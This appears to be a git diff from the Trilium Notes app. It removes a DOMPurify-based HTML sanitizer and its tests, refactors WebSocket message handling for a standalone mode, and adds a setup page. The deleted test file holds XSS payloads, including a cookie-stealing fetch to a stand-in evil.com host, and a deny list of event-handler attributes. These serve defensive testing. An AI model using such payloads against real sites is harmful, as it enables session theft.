-    numberPrecision?: number;
-    promotedAlias?: string;
-    inverseRelation?: string;
-}
+import { DefinitionObject, LabelType, Multiplicity } from "@triliumnext/commons";
 
 function parse(value: string) {
     const tokens = value.split(",").map((t) => t.trim());

apps/client/src/services/sanitize_content.spec.ts

@@ -1,236 +0,0 @@
-import { describe, expect, it } from "vitest";
-import { sanitizeNoteContentHtml } from "./sanitize_content";
-
-describe("sanitizeNoteContentHtml", () => {
-    // --- Preserves legitimate CKEditor content ---
-
-    it("preserves basic rich text formatting", () => {
-        const html = '<p><strong>Bold</strong> and <em>italic</em> text</p>';
-        expect(sanitizeNoteContentHtml(html)).toBe(html);
-    });
-
-    it("preserves headings", () => {
-        const html = '<h1>Title</h1><h2>Subtitle</h2><h3>Section</h3>';
-        expect(sanitizeNoteContentHtml(html)).toBe(html);
-    });
-
-    it("preserves links with href", () => {
-        const html = '<a href="https://example.com">Link</a>';
-        expect(sanitizeNoteContentHtml(html)).toBe(html);
-    });
-
-    it("preserves internal note links with data attributes", () => {
-        const html = '<a class="reference-link" href="#root/abc123" data-note-path="root/abc123">My Note</a>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain('class="reference-link"');
-        expect(result).toContain('href="#root/abc123"');
-        expect(result).toContain('data-note-path="root/abc123"');
-        expect(result).toContain(">My Note</a>");
-    });
-
-    it("preserves images with src", () => {
-        const html = '<img src="api/images/abc123/image.png" alt="test">';
-        expect(sanitizeNoteContentHtml(html)).toContain('src="api/images/abc123/image.png"');
-    });
-
-    it("preserves tables", () => {
-        const html = '<table><thead><tr><th>Header</th></tr></thead><tbody><tr><td>Cell</td></tr></tbody></table>';
-        expect(sanitizeNoteContentHtml(html)).toBe(html);
-    });
-
-    it("preserves code blocks", () => {
-        const html = '<pre><code class="language-javascript">const x = 1;</code></pre>';
-        expect(sanitizeNoteContentHtml(html)).toBe(html);
-    });
-
-    it("preserves include-note sections with data-note-id", () => {
-        const html = '<section class="include-note" data-note-id="abc123">&nbsp;</section>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain('class="include-note"');
-        expect(result).toContain('data-note-id="abc123"');
-        expect(result).toContain("&nbsp;</section>");
-    });
-
-    it("preserves figure and figcaption", () => {
-        const html = '<figure><img src="test.png"><figcaption>Caption</figcaption></figure>';
-        expect(sanitizeNoteContentHtml(html)).toContain("<figure>");
-        expect(sanitizeNoteContentHtml(html)).toContain("<figcaption>");
-    });
-
-    it("preserves task list checkboxes", () => {
-        const html = '<ul><li><input type="checkbox" checked disabled>Task done</li></ul>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain('type="checkbox"');
-        expect(result).toContain("checked");
-    });
-
-    it("preserves inline styles for colors", () => {
-        const html = '<span style="color: red;">Red text</span>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain("style");
-        expect(result).toContain("color");
-    });
-
-    it("preserves data-* attributes", () => {
-        const html = '<div data-custom-attr="value" data-note-id="abc">Content</div>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain('data-custom-attr="value"');
-        expect(result).toContain('data-note-id="abc"');
-    });
-
-    // --- Blocks XSS vectors ---
-
-    it("strips script tags", () => {
-        const html = '<p>Hello</p><script>alert("XSS")</script><p>World</p>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<script");
-        expect(result).not.toContain("alert");
-        expect(result).toContain("<p>Hello</p>");
-        expect(result).toContain("<p>World</p>");
-    });
-
-    it("strips onerror event handlers on images", () => {
-        const html = '<img src="x" onerror="alert(1)">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onerror");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips onclick event handlers", () => {
-        const html = '<div onclick="alert(1)">Click me</div>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onclick");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips onload event handlers", () => {
-        const html = '<img src="x" onload="alert(1)">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onload");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips onmouseover event handlers", () => {
-        const html = '<span onmouseover="alert(1)">Hover</span>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onmouseover");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips onfocus event handlers", () => {
-        const html = '<input onfocus="alert(1)" autofocus>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onfocus");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips javascript: URIs in href", () => {
-        const html = '<a href="javascript:alert(1)">Click</a>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("javascript:");
-    });
-
-    it("strips javascript: URIs in img src", () => {
-        const html = '<img src="javascript:alert(1)">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("javascript:");
-    });
-
-    it("strips iframe tags", () => {
-        const html = '<iframe src="https://evil.com"></iframe>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<iframe");
-    });
-
-    it("strips object tags", () => {
-        const html = '<object data="evil.swf"></object>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<object");
-    });
-
-    it("strips embed tags", () => {
-        const html = '<embed src="evil.swf">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<embed");
-    });
-
-    it("strips style tags", () => {
-        const html = '<style>body { background: url("javascript:alert(1)") }</style><p>Text</p>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<style");
-        expect(result).toContain("<p>Text</p>");
-    });
-
-    it("strips SVG with embedded script", () => {
-        const html = '<svg><script>alert(1)</script></svg>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<script");
-        expect(result).not.toContain("alert");
-    });
-
-    it("strips meta tags", () => {
-        const html = '<meta http-equiv="refresh" content="0;url=evil.com"><p>Text</p>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<meta");
-    });
-
-    it("strips base tags", () => {
-        const html = '<base href="https://evil.com/"><p>Text</p>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<base");
-    });
-
-    it("strips link tags", () => {
-        const html = '<link rel="stylesheet" href="evil.css"><p>Text</p>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<link");
-    });
-
-    // --- Edge cases ---
-
-    it("handles empty string", () => {
-        expect(sanitizeNoteContentHtml("")).toBe("");
-    });
-
-    it("handles null-like falsy values", () => {
-        expect(sanitizeNoteContentHtml(null as unknown as string)).toBe(null);
-        expect(sanitizeNoteContentHtml(undefined as unknown as string)).toBe(undefined);
-    });
-
-    it("handles nested XSS attempts", () => {
-        const html = '<div><p>Safe</p><img src=x onerror="fetch(\'https://evil.com/?c=\'+document.cookie)"><p>Also safe</p></div>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("onerror");
-        expect(result).not.toContain("fetch");
-        expect(result).not.toContain("cookie");
-        expect(result).toContain("Safe");
-        expect(result).toContain("Also safe");
-    });
-
-    it("handles case-varied event handlers", () => {
-        const html = '<img src="x" ONERROR="alert(1)">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result.toLowerCase()).not.toContain("onerror");
-    });
-
-    it("strips dangerous data: URI on anchor elements", () => {
-        const html = '<a href="data:text/html,<script>alert(1)</script>">Click</a>';
-        const result = sanitizeNoteContentHtml(html);
-        // DOMPurify should either strip the href or remove the dangerous content
-        expect(result).not.toContain("<script");
-        expect(result).not.toContain("alert(1)");
-    });
-
-    it("allows data: URI on image elements", () => {
-        const html = '<img src="data:image/png;base64,iVBOR...">';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).toContain("data:image/png");
-    });
-
-    it("strips template tags which could contain scripts", () => {
-        const html = '<template><script>alert(1)</script></template>';
-        const result = sanitizeNoteContentHtml(html);
-        expect(result).not.toContain("<script");
-        expect(result).not.toContain("<template");
-    });
-});

apps/client/src/services/sanitize_content.ts

@@ -1,161 +0,0 @@
-/**
- * Client-side HTML sanitization for note content rendering.
- *
- * This module provides sanitization of HTML content before it is injected into
- * the DOM, preventing stored XSS attacks. Content written through non-CKEditor
- * paths (Internal API, ETAPI, Sync) may contain malicious scripts, event
- * handlers, or other XSS vectors that must be stripped before rendering.
- *
- * Uses DOMPurify, a well-audited XSS sanitizer that is already a transitive
- * dependency of this project (via mermaid).
- *
- * The configuration is intentionally permissive for rich-text formatting
- * (bold, italic, headings, tables, images, links, etc.) while blocking
- * script execution vectors (script tags, event handlers, javascript: URIs,
- * data: URIs on non-image elements, etc.).
- */
-import DOMPurify from "dompurify";
-
-/**
- * Tags allowed in sanitized note content. This mirrors the server-side
- * SANITIZER_DEFAULT_ALLOWED_TAGS from @triliumnext/commons plus additional
- * tags needed for CKEditor content rendering (e.g. <section> for included
- * notes, <figure>/<figcaption> for images and tables).
- *
- * Notably absent: <script>, <style>, <iframe>, <object>, <embed>, <form>,
- * <input> (except checkbox via specific attribute allowance), <link>, <meta>.
- */
-const ALLOWED_TAGS = [
-    // Headings
-    "h1", "h2", "h3", "h4", "h5", "h6",
-    // Block elements
-    "blockquote", "p", "div", "pre", "section", "article", "aside",
-    "header", "footer", "hgroup", "main", "nav", "address", "details", "summary",
-    // Lists
-    "ul", "ol", "li", "dl", "dt", "dd", "menu",
-    // Inline formatting
-    "a", "b", "i", "strong", "em", "strike", "s", "del", "ins",
-    "abbr", "code", "kbd", "mark", "q", "time", "var", "wbr",
-    "small", "sub", "sup", "big", "tt", "samp", "dfn", "bdi", "bdo",
-    "cite", "acronym", "data", "rp",
-    // Tables
-    "table", "thead", "caption", "tbody", "tfoot", "tr", "th", "td",
-    "col", "colgroup",
-    // Media
-    "img", "figure", "figcaption", "video", "audio", "picture",
-    "area", "map", "track",
-    // Separators
-    "hr", "br",
-    // Interactive (limited)
-    "label", "input",
-    // Other
-    "span",
-    // CKEditor specific
-    "en-media"
-];
-
-/**
- * Attributes allowed on sanitized elements. DOMPurify uses a flat list
- * of allowed attribute names that apply to all elements.
- */
-const ALLOWED_ATTR = [
-    // Common
-    "class", "style", "title", "id", "dir", "lang", "tabindex",
-    "spellcheck", "translate", "hidden",
-    // Links
-    "href", "target", "rel",
-    // Images & media
-    "src", "alt", "width", "height", "loading", "srcset", "sizes",
-    "controls", "autoplay", "loop", "muted", "preload", "poster",
-    // Data attributes (CKEditor uses these extensively)
-    // DOMPurify allows data-* by default when ADD_ATTR includes them
-    // Tables
-    "colspan", "rowspan", "scope", "headers",
-    // Input (for checkboxes in task lists)
-    "type", "checked", "disabled",
-    // Misc
-    "align", "valign", "center",
-    "open", // for <details>
-    "datetime", // for <time>, <del>, <ins>
-    "cite" // for <blockquote>, <del>, <ins>
-];
-
-/**
- * URI-safe protocols allowed in href/src attributes.
- * Blocks javascript:, vbscript:, and other dangerous schemes.
- */
-// Note: data: is intentionally omitted here; it is handled via ADD_DATA_URI_TAGS
-// which restricts data: URIs to only <img> elements.
-const ALLOWED_URI_REGEXP = /^(?:(?:https?|ftps?|mailto|evernote|file|gemini|git|gopher|irc|irc6|jabber|magnet|sftp|skype|sms|spotify|steam|svn|tel|smb|zotero|geo|obsidian|logseq|onenote|slack):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i;
-
-/**
- * DOMPurify configuration for sanitizing note content.
- */
-const PURIFY_CONFIG: DOMPurify.Config = {
-    ALLOWED_TAGS,
-    ALLOWED_ATTR,
-    ALLOWED_URI_REGEXP,
-    // Allow data-* attributes (used extensively by CKEditor)
-    ADD_ATTR: ["data-note-id", "data-note-path", "data-href", "data-language",
-               "data-value", "data-box-type", "data-link-id", "data-no-context-menu"],
-    // Do not allow <style> or <script> tags
-    FORBID_TAGS: ["script", "style", "iframe", "object", "embed", "link", "meta",
-                  "base", "noscript", "template"],
-    // Do not allow event handler attributes
-    FORBID_ATTR: ["onerror", "onload", "onclick", "onmouseover", "onfocus",
-                  "onblur", "onsubmit", "onreset", "onchange", "oninput",
-                  "onkeydown", "onkeyup", "onkeypress", "onmousedown",
-                  "onmouseup", "onmousemove", "onmouseout", "onmouseenter",
-                  "onmouseleave", "ondblclick", "oncontextmenu", "onwheel",
-                  "ondrag", "ondragend", "ondragenter", "ondragleave",
-                  "ondragover", "ondragstart", "ondrop", "onscroll",
-                  "oncopy", "oncut", "onpaste", "onanimationend",
-                  "onanimationiteration", "onanimationstart",
-                  "ontransitionend", "onpointerdown", "onpointerup",
-                  "onpointermove", "onpointerover", "onpointerout",
-                  "onpointerenter", "onpointerleave", "ontouchstart",
-                  "ontouchend", "ontouchmove", "ontouchcancel"],
-    // Allow data: URIs only for images (needed for inline images)
-    ADD_DATA_URI_TAGS: ["img"],
-    // Return a string
-    RETURN_DOM: false,
-    RETURN_DOM_FRAGMENT: false,
-    // Keep the document structure intact
-    WHOLE_DOCUMENT: false,
-    // Allow target attribute on links
-    ADD_TAGS: []
-};
-
-// Configure a DOMPurify hook to handle data-* attributes more broadly
-// since CKEditor uses many custom data attributes.
-DOMPurify.addHook("uponSanitizeAttribute", (node, data) => {
-    // Allow all data-* attributes
-    if (data.attrName.startsWith("data-")) {
-        data.forceKeepAttr = true;
-    }
-});
-
-/**
- * Sanitizes HTML content for safe rendering in the DOM.
- *
- * This function should be called on all user-provided HTML content before
- * inserting it into the DOM via dangerouslySetInnerHTML, jQuery .html(),
- * or Element.innerHTML.
- *
- * The sanitizer preserves rich-text formatting produced by CKEditor
- * (bold, italic, links, tables, images, code blocks, etc.) while
- * stripping XSS vectors (script tags, event handlers, javascript: URIs).
- *
- * @param dirtyHtml - The untrusted HTML string to sanitize.
- * @returns A sanitized HTML string safe for DOM insertion.
- */
-export function sanitizeNoteContentHtml(dirtyHtml: string): string {
-    if (!dirtyHtml) {
-        return dirtyHtml;
-    }
-    return DOMPurify.sanitize(dirtyHtml, PURIFY_CONFIG) as string;
-}
-
-export default {
-    sanitizeNoteContentHtml
-};

apps/client/src/services/utils.ts

@@ -135,6 +135,8 @@ export function isElectron() {
     return !!(window && window.process && window.process.type);
 }
 
+export const isStandalone = window.glob.isStandalone;
+
 /**
  * Returns `true` if the client is running as a PWA, otherwise `false`.
  */
@@ -816,7 +818,7 @@ function compareVersions(v1: string, v2: string): number {
 /**
  * Compares two semantic version strings and returns `true` if the latest version is greater than the current version.
  */
-function isUpdateAvailable(latestVersion: string | null | undefined, currentVersion: string): boolean {
+export function isUpdateAvailable(latestVersion: string | null | undefined, currentVersion: string): boolean {
     if (!latestVersion) {
         return false;
     }
@@ -903,6 +905,10 @@ export function getErrorMessage(e: unknown) {
 
 }
 
+export function replaceHtmlEscapedSlashes(str: string) {
+    return str.replace(///g, "/");
+}
+
 /**
  * Handles left or right placement of e.g. tooltips in case of right-to-left languages. If the current language is a RTL one, then left and right are swapped. Other directions are unaffected.
  * @param placement a string optionally containing a "left" or "right" value.

apps/client/src/services/ws.ts

@@ -1,13 +1,14 @@
-import utils from "./utils.js";
-import toastService from "./toast.js";
-import server from "./server.js";
-import options from "./options.js";
-import frocaUpdater from "./froca_updater.js";
-import appContext from "../components/app_context.js";
-import { t } from "./i18n.js";
-import type { EntityChange } from "../server_types.js";
 import { WebSocketMessage } from "@triliumnext/commons";
+
+import appContext from "../components/app_context.js";
+import type { EntityChange } from "../server_types.js";
+import frocaUpdater from "./froca_updater.js";
+import { t } from "./i18n.js";
+import options from "./options.js";
+import server from "./server.js";
+import toastService from "./toast.js";
 import toast from "./toast.js";
+import utils from "./utils.js";
 
 type MessageHandler = (message: WebSocketMessage) => void;
 let messageHandlers: MessageHandler[] = [];
@@ -57,6 +58,49 @@ export function unsubscribeToMessage(messageHandler: MessageHandler) {
     messageHandlers = messageHandlers.filter(handler => handler !== messageHandler);
 }
 
+/**
+ * Dispatch a message to all handlers and process it.
+ * This is the main entry point for incoming messages from any provider
+ * (WebSocket, Worker, etc.)
+ */
+export async function dispatchMessage(message: WebSocketMessage) {
+    // Notify all subscribers
+    for (const messageHandler of messageHandlers) {
+        messageHandler(message);
+    }
+
+    // Use string type for flexibility - server sends more message types than are typed
+    const messageType = message.type as string;
+    const msg = message as any;
+
+    // Process the message
+    if (messageType === "ping") {
+        lastPingTs = Date.now();
+    } else if (messageType === "reload-frontend") {
+        utils.reloadFrontendApp("received request from backend to reload frontend");
+    } else if (messageType === "frontend-update") {
+        await executeFrontendUpdate(msg.data.entityChanges);
+    } else if (messageType === "sync-hash-check-failed") {
+        toastService.showError(t("ws.sync-check-failed"), 60000);
+    } else if (messageType === "consistency-checks-failed") {
+        toastService.showError(t("ws.consistency-checks-failed"), 50 * 60000);
+    } else if (messageType === "api-log-messages") {
+        appContext.triggerEvent("apiLogMessages", { noteId: msg.noteId, messages: msg.messages });
+    } else if (messageType === "toast") {
+        toastService.showMessage(msg.message);
+    } else if (messageType === "execute-script") {
+        // TODO: Remove after porting the file
+        // @ts-ignore
+        const bundleService = (await import("./bundle.js")).default as any;
+        // TODO: Remove after porting the file
+        // @ts-ignore
+        const froca = (await import("./froca.js")).default as any;
+        const originEntity = msg.originEntityId ? await froca.getNote(msg.originEntityId) : null;
+
+        bundleService.getAndExecuteBundle(msg.currentNoteId, originEntity, msg.script, msg.params);
+    }
+}
+
 // used to serialize frontend update operations
 let consumeQueuePromise: Promise<void> | null = null;
 
@@ -112,38 +156,13 @@ async function executeFrontendUpdate(entityChanges: EntityChange[]) {
     }
 }
 
-async function handleMessage(event: MessageEvent<any>) {
-    const message = JSON.parse(event.data);
-
-    for (const messageHandler of messageHandlers) {
-        messageHandler(message);
-    }
-
-    if (message.type === "ping") {
-        lastPingTs = Date.now();
-    } else if (message.type === "reload-frontend") {
-        utils.reloadFrontendApp("received request from backend to reload frontend");
-    } else if (message.type === "frontend-update") {
-        await executeFrontendUpdate(message.data.entityChanges);
-    } else if (message.type === "sync-hash-check-failed") {
-        toastService.showError(t("ws.sync-check-failed"), 60000);
-    } else if (message.type === "consistency-checks-failed") {
-        toastService.showError(t("ws.consistency-checks-failed"), 50 * 60000);
-    } else if (message.type === "api-log-messages") {
-        appContext.triggerEvent("apiLogMessages", { noteId: message.noteId, messages: message.messages });
-    } else if (message.type === "toast") {
-        toastService.showMessage(message.message);
-    } else if (message.type === "execute-script") {
-        // TODO: Remove after porting the file
-        // @ts-ignore
-        const bundleService = (await import("./bundle.js")).default as any;
-        // TODO: Remove after porting the file
-        // @ts-ignore
-        const froca = (await import("./froca.js")).default as any;
-        const originEntity = message.originEntityId ? await froca.getNote(message.originEntityId) : null;
-
-        bundleService.getAndExecuteBundle(message.currentNoteId, originEntity, message.script, message.params);
-    }
+/**
+ * WebSocket message handler - parses the event and dispatches to generic handler.
+ * This is only used in WebSocket mode (not standalone).
+ */
+async function handleWebSocketMessage(event: MessageEvent<string>) {
+    const message = JSON.parse(event.data) as WebSocketMessage;
+    await dispatchMessage(message);
 }
 
 let entityChangeIdReachedListeners: {
@@ -161,7 +180,7 @@ function waitForEntityChangeId(desiredEntityChangeId: number) {
 
     return new Promise<void>((res, rej) => {
         entityChangeIdReachedListeners.push({
-            desiredEntityChangeId: desiredEntityChangeId,
+            desiredEntityChangeId,
             resolvePromise: res,
             start: Date.now()
         });
@@ -228,13 +247,19 @@ function connectWebSocket() {
     // use wss for secure messaging
     const ws = new WebSocket(webSocketUri);
     ws.onopen = () => console.debug(utils.now(), `Connected to server ${webSocketUri} with WebSocket`);
-    ws.onmessage = handleMessage;
+    ws.onmessage = handleWebSocketMessage;
     // we're not handling ws.onclose here because reconnection is done in sendPing()
 
     return ws;
 }
 
 async function sendPing() {
+    console.log("Got ws", ws);
+    if (!ws) {
+        // In standalone mode, there's no WebSocket — nothing to ping.
+        return;
+    }
+
     if (Date.now() - lastPingTs > 30000) {
         console.warn(utils.now(), "Lost websocket connection to the backend");
         toast.showPersistent({
@@ -263,6 +288,16 @@ async function sendPing() {
 setTimeout(() => {
     if (glob.device === "print") return;
 
+    if (glob.isStandalone) {
+        // In standalone mode, listen for messages from the local worker via custom event
+        window.addEventListener("trilium:ws-message", ((event: CustomEvent<WebSocketMessage>) => {
+            dispatchMessage(event.detail);
+        }) as EventListener);
+        console.debug(utils.now(), "Standalone mode: listening for worker messages");
+        return;
+    }
+
+    // Normal mode: use WebSocket
     ws = connectWebSocket();
 
     lastPingTs = Date.now();

apps/client/src/setup.css

@@ -0,0 +1,292 @@
+html,
+body {
+    margin: 0;
+    padding: 0;
+    width: 100vw;
+    height: 100vh;
+}
+
+body.setup {
+    margin: 0;
+    padding: 0;
+
+    &>div {
+        background:
+            radial-gradient(ellipse at 20% 50%, rgba(99, 102, 241, 0.3) 0%, transparent 50%),
+            radial-gradient(ellipse at 80% 20%, rgba(168, 85, 247, 0.25) 0%, transparent 50%),
+            radial-gradient(ellipse at 60% 80%, rgba(59, 130, 246, 0.25) 0%, transparent 50%),
+            var(--left-pane-background-color);
+        padding: 2em;
+        width: 100vw;
+        height: 100vh;
+        display: flex;
+        justify-content: center;
+        align-items: center;
+
+        .setup-container {
+            background-color: var(--main-background-color);
+            border-radius: 16px;
+            padding: 2em;
+            display: flex;
+            flex-direction: column;
+            gap: 2rem;
+            height: 550px;
+            width: 700px;
+            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.1);
+            overflow: hidden;
+            position: relative;
+
+            .setup-options {
+                display: flex;
+                flex-direction: column;
+                justify-content: center;
+                gap: 1rem;
+
+                .setup-option-card {
+                    padding: 1.5em;
+                    cursor: pointer;
+                    display: flex;
+                    align-items: center;
+                    gap: 1rem;
+
+                    &:hover {
+                        background-color: var(--card-background-hover-color);
+                        filter: contrast(105%);
+                        transition: background-color .2s ease-out;
+                    }
+
+                    .tn-icon {
+                        font-size: 2.5em;
+                        color: var(--muted-text-color);
+                    }
+
+                    h3 {
+                        font-size: 1.5em;
+                        font-weight: normal;
+                    }
+
+                    p:last-of-type {
+                        margin-bottom: 0;
+                        color: var(--muted-text-color);
+                    }
+                }
+            }
+        }
+
+        .page {
+            display: flex;
+            flex-direction: column;
+            height: 100%;
+
+            >main {
+                flex: 1;
+                display: flex;
+                flex-direction: column;
+                padding-top: 1em;
+                overflow: auto;
+            }
+
+            >footer {
+                display: flex;
+                justify-content: flex-end;
+                gap: 0.5rem;
+                border-top: 1px solid var(--main-border-color);
+                padding-top: 1rem;
+            }
+        }
+
+        form {
+            display: flex;
+            flex-direction: column;
+            justify-content: center;
+            flex-grow: 1;
+            gap: 1rem;
+            width: 80%;
+            margin: auto;
+
+            .admonition {
+                margin: 0;
+            }
+        }
+
+        .form-item-with-icon {
+            display: flex;
+            align-items: center;
+            gap: 0.5rem;
+
+            .tn-icon {
+                font-size: 1.5em;
+                color: var(--muted-text-color);
+            }
+        }
+    }
+
+    .lds-ring {
+        display: inline-block;
+        position: relative;
+        width: 60px;
+        height: 60px;
+
+        &>div {
+            box-sizing: border-box;
+            display: block;
+            position: absolute;
+            width: var(--size, 48px);
+            height: var(--size, 48px);
+            margin: 8px;
+            border: 6px solid black;
+            border-radius: 50%;
+            animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
+            border-color: black transparent transparent transparent;
+
+            &:nth-child(1) {
+                animation-delay: -0.45s;
+            }
+            &:nth-child(2) {
+                animation-delay: -0.3s;
+            }
+            &:nth-child(3) {
+                animation-delay: -0.15s;
+            }
+        }
+    }
+
+    .sync-illustration {
+        display: flex;
+        justify-content: center;
+        margin-bottom: 1.5rem;
+
+        .tn-icon {
+            font-size: 3em;
+            color: var(--muted-text-color);
+        }
+
+        >div {
+            display: flex;
+            flex-direction: column;
+            text-align: center;
+            gap: 0.5rem;
+            line-height: 1;
+            font-size: 0.85rem;
+        }
+
+        .sync-illustration-arrows {
+            width: 60px;
+            height: 3em;
+            position: relative;
+
+            &::after {
+                content: "";
+                position: absolute;
+                border: 2px dashed var(--main-border-color);
+                top: 1.5em;
+                left: 0;
+                right: 0;
+            }
+        }
+    }
+
+    h1 {
+        font-size: 1.4em;
+        text-align: center;
+    }
+
+    h1 + p {
+        text-align: center;
+        color: var(--muted-text-color);
+    }
+}
+
+@keyframes lds-ring {
+    0% {
+        transform: rotate(0deg);
+    }
+    100% {
+        transform: rotate(360deg);
+    }
+}
+
+/* Slide transitions */
+.slide-page {
+    position: absolute;
+    inset: 0;
+    padding: 2em;
+}
+
+.slide-out-forward,
+.slide-out-backward,
+.slide-in-forward,
+.slide-in-backward {
+    animation-duration: 0.35s;
+    animation-timing-function: ease-in-out;
+    animation-fill-mode: forwards;
+}
+
+.slide-out-forward {
+    animation-name: slide-out-left;
+}
+
+.slide-out-backward {
+    animation-name: slide-out-right;
+}
+
+.slide-in-forward {
+    animation-name: slide-in-right;
+}
+
+.slide-in-backward {
+    animation-name: slide-in-left;
+}
+
+.page.sync-in-progress {
+    .sync-progress {
+        margin-top: 0.5rem;
+        display: flex;
+        align-items: center;
+        gap: 0.5rem;
+
+        progress {
+            width: 100%;
+            height: 1rem;
+            border-radius: 0.5rem;
+            overflow: hidden;
+            appearance: none;
+
+            &::-webkit-progress-bar {
+                background-color: var(--main-border-color);
+            }
+
+            &::-webkit-progress-value {
+                background-color: var(--main-text-color);
+                transition: width 0.2s ease-out;
+            }
+        }
+
+        span {
+            font-size: 0.85rem;
+            color: var(--muted-text-color);
+            min-width: 2.5em;
+            text-align: right;
+        }
+    }
+}
+
+@keyframes slide-out-left {
+    from { transform: translateX(0); opacity: 1; }
+    to   { transform: translateX(-100%); opacity: 0; }
+}
+
+@keyframes slide-out-right {
+    from { transform: translateX(0); opacity: 1; }
+    to   { transform: translateX(100%); opacity: 0; }
+}
+
+@keyframes slide-in-right {
+    from { transform: translateX(100%); opacity: 0; }
+    to   { transform: translateX(0); opacity: 1; }
+}
+
+@keyframes slide-in-left {
+    from { transform: translateX(-100%); opacity: 0; }
+    to   { transform: translateX(0); opacity: 1; }
+}

apps/client/src/setup.tsx

@@ -0,0 +1,343 @@
+import "./setup.css";
+
+import { SetupSyncFromServerResponse } from "@triliumnext/commons";
+import { ComponentChildren, render } from "preact";
+import { useEffect, useRef, useState } from "preact/hooks";
+
+import { initLocale, t } from "./services/i18n";
+import server from "./services/server";
+import { replaceHtmlEscapedSlashes } from "./services/utils";
+import Admonition from "./widgets/react/Admonition";
+import Button from "./widgets/react/Button";
+import { Card, CardFrame, CardSection } from "./widgets/react/Card";
+import Collapsible from "./widgets/react/Collapsible";
+import FormTextBox from "./widgets/react/FormTextBox";
+import Icon from "./widgets/react/Icon";
+
+async function main() {
+    await initLocale();
+
+    const bodyWrapper = document.createElement("div");
+    document.body.classList.add("setup");
+    render(<App />, bodyWrapper);
+    document.body.replaceChildren(bodyWrapper);
+}
+
+type State = "firstOptions" | "createNewDocument" | "syncFromDesktop" | "syncFromServer" | "syncInProgress" | "syncFailed";
+
+const STATE_ORDER: State[] = ["firstOptions", "createNewDocument", "syncFromDesktop", "syncFromServer", "syncInProgress", "syncFailed"];
+
+function renderState(state: State, setState: (state: State) => void) {
+    switch (state) {
+        case "firstOptions": return <SetupOptions setState={setState} />;
+        case "createNewDocument": return <CreateNewDocument />;
+        case "syncFromServer": return <SyncFromServer setState={setState} />;
+        case "syncFromDesktop": return <SyncFromDesktop setState={setState} />;
+        case "syncInProgress": return <SyncInProgress device="server" />;
+        default: return null;
+    }
+}
+
+function App() {
+    const [state, setState] = useState<State>("firstOptions");
+    const [prevState, setPrevState] = useState<State | null>(null);
+    const [transitioning, setTransitioning] = useState(false);
+    const prevStateRef = useRef<State>(state);
+
+    function handleSetState(newState: State) {
+        setPrevState(prevStateRef.current);
+        prevStateRef.current = newState;
+        setTransitioning(true);
+        setState(newState);
+    }
+
+    const direction = prevState !== null
+        ? STATE_ORDER.indexOf(state) > STATE_ORDER.indexOf(prevState) ? "forward" : "backward"
+        : "forward";
+
+    return (
+        <div class="setup-container">
+            {transitioning && prevState !== null && (
+                <div
+                    class={`slide-page slide-out-${direction}`}
+                    onAnimationEnd={() => {
+                        setTransitioning(false);
+                        setPrevState(null);
+                    }}
+                >
+                    {renderState(prevState, handleSetState)}
+                </div>
+            )}
+            <div class={`slide-page ${transitioning ? `slide-in-${direction}` : "slide-current"}`} key={state}>
+                {renderState(state, handleSetState)}
+            </div>
+        </div>
+    );
+}
+
+function SetupOptions({ setState }: { setState: (state: State) => void }) {
+    return (
+        <div class="page setup-options-container">
+            <h1>{t("setup.heading")}</h1>
+
+            <main class="setup-options">
+                <SetupOptionCard
+                    icon="bx bx-file-blank"
+                    title={t("setup.new-document")}
+                    description={t("setup.new-document-description")}
+                    onClick={() => setState("createNewDocument")}
+                />
+
+                <SetupOptionCard
+                    icon="bx bx-server"
+                    title={t("setup.sync-from-server")}
+                    description={t("setup.sync-from-server-description")}
+                    onClick={() => setState("syncFromServer")}
+                />
+
+                <SetupOptionCard
+                    icon="bx bx-desktop"
+                    title={t("setup.sync-from-desktop")}
+                    description={t("setup.sync-from-desktop-description")}
+                    onClick={() => setState("syncFromDesktop")}
+                />
+            </main>
+        </div>
+    );
+}
+
+type SyncStep = "connecting" | "syncing" | "finalizing";
+
+function getSyncStep(stats: { outstandingPullCount: number; totalPullCount: number | null; initialized: boolean }): SyncStep {
+    if (stats.initialized) {
+        return "finalizing"; // will reload momentarily
+    }
+    if (stats.totalPullCount !== null && stats.outstandingPullCount > 0) {
+        return "syncing";
+    }
+    if (stats.totalPullCount !== null && stats.outstandingPullCount === 0) {
+        return "finalizing";
+    }
+    return "connecting";
+}
+
+function SyncInProgress({ device }: { device: "server" | "desktop" }) {
+    const stats = useOutstandingSyncInfo();
+    const step = getSyncStep(stats);
+
+    useEffect(() => {
+        if (stats.initialized) {
+            location.reload();
+        }
